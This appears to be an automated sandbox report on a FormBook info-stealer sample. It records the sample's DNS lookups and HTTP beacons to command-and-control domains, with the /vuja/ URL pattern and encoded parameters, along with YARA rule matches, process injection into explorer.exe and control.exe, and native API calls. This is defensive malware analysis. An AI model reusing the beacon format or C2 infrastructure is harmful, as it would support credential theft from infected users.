Source: C:\Windows\explorer.exe	Domain query: www.d0berman245.xyz
Source: C:\Windows\explorer.exe	Domain query: www.cherrybunk.life
Source: C:\Windows\explorer.exe	Domain query: www.hellocharmaine.com
Source: C:\Windows\explorer.exe	Domain query: www.syzhtr.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 99.83.154.118 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.72.144.19 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.d0berman245.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.dressmids.com/vuja/

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1Host: www.cherrybunk.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.d0berman245.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1Host: www.fraktal.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.expertexceleratorchallenge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1Host: www.hellocharmaine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.syzhtr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1Host: www.tjandamber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1Host: www.realstylecelebz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.dressmids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1Host: www.discomountainkombucha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 91.195.240.94 91.195.240.94

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Sep 2021 08:10:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	String found in binary or memory: https://www.value-domain.com/
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	String found in binary or memory: https://www.value-domain.com/modall.php

Source: unknown

DNS traffic detected: queries for: www.cherrybunk.life

Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1Host: www.cherrybunk.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.d0berman245.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1Host: www.fraktal.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.expertexceleratorchallenge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1Host: www.hellocharmaine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.syzhtr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1Host: www.tjandamber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1Host: www.realstylecelebz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1Host: www.dressmids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1Host: www.discomountainkombucha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Show sources

Source: tgamf4XuLa.exe, Forms/mainForm.cs	Long String: Length: 38272
Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs	Long String: Length: 38272
Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272

Source: tgamf4XuLa.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 0_2_0288C124	0_2_0288C124
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 0_2_0288E561	0_2_0288E561
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 0_2_0288E570	0_2_0288E570
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041B9C8	6_2_0041B9C8
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041C272	6_2_0041C272
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00408C5C	6_2_00408C5C
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00408C60	6_2_00408C60
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041B4A3	6_2_0041B4A3
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00402D87	6_2_00402D87
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0508F900	20_2_0508F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05080D20	20_2_05080D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A4120	20_2_050A4120
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05151D55	20_2_05151D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509D5E0	20_2_0509D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_05141002	20_2_05141002
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509841F	20_2_0509841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_0509B090	20_2_0509B090
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050BEBB0	20_2_050BEBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050A6E30	20_2_050A6E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EC2FB0	20_2_02EC2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EC8C60	20_2_02EC8C60
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EC8C5C	20_2_02EC8C5C
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EC2D87	20_2_02EC2D87
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_02EC2D90	20_2_02EC2D90

Source: C:\Windows\SysWOW64\control.exe

Code function: String function: 0508B150 appears 32 times

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_004181C0 NtCreateFile,	6_2_004181C0
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_00418270 NtReadFile,	6_2_00418270
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_004182F0 NtClose,	6_2_004182F0
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_004183A0 NtAllocateVirtualMemory,	6_2_004183A0
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_004181BA NtCreateFile,	6_2_004181BA
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041826A NtReadFile,	6_2_0041826A
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_004182EA NtClose,	6_2_004182EA
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Code function: 6_2_0041839A NtAllocateVirtualMemory,	6_2_0041839A
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	20_2_050C9910
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9540 NtReadFile,LdrInitializeThunk,	20_2_050C9540
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C99A0 NtCreateSection,LdrInitializeThunk,	20_2_050C99A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C95D0 NtClose,LdrInitializeThunk,	20_2_050C95D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9840 NtDelayExecution,LdrInitializeThunk,	20_2_050C9840
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9860 NtQuerySystemInformation,LdrInitializeThunk,	20_2_050C9860
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9710 NtQueryInformationToken,LdrInitializeThunk,	20_2_050C9710
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9780 NtMapViewOfSection,LdrInitializeThunk,	20_2_050C9780
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9FE0 NtCreateMutant,LdrInitializeThunk,	20_2_050C9FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9650 NtQueryValueKey,LdrInitializeThunk,	20_2_050C9650
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9A50 NtCreateFile,LdrInitializeThunk,	20_2_050C9A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	20_2_050C9660
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C96D0 NtCreateKey,LdrInitializeThunk,	20_2_050C96D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	20_2_050C96E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9520 NtWaitForSingleObject,	20_2_050C9520
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050CAD30 NtSetContextThread,	20_2_050CAD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9950 NtQueueApcThread,	20_2_050C9950
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9560 NtWriteFile,	20_2_050C9560
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C99D0 NtCreateProcessEx,	20_2_050C99D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C95F0 NtQueryInformationFile,	20_2_050C95F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C9820 NtEnumerateKey,	20_2_050C9820
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050CB040 NtSuspendThread,	20_2_050CB040
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C98A0 NtWriteVirtualMemory,	20_2_050C98A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 20_2_050C98F0 NtReadVirtualMemory,	20_2_050C98F0
